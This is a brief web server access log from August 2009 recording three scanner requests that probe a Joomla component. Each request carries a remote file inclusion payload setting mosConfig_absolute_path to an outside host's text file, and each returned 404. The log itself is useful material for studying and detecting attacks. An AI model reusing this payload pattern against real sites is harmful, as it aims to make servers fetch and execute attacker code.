218.150.78.235 - - [03/Aug/2009:02:52:49 -0400] "GET /logs/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hongju.es.kr/bbs/images/file/tes.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:02:52:49 -0400] "GET /administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hongju.es.kr/bbs/images/file/tes.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
218.150.78.235 - - [03/Aug/2009:02:52:49 -0400] "GET /logs/access_log.Q109062400/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://hongju.es.kr/bbs/images/file/tes.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
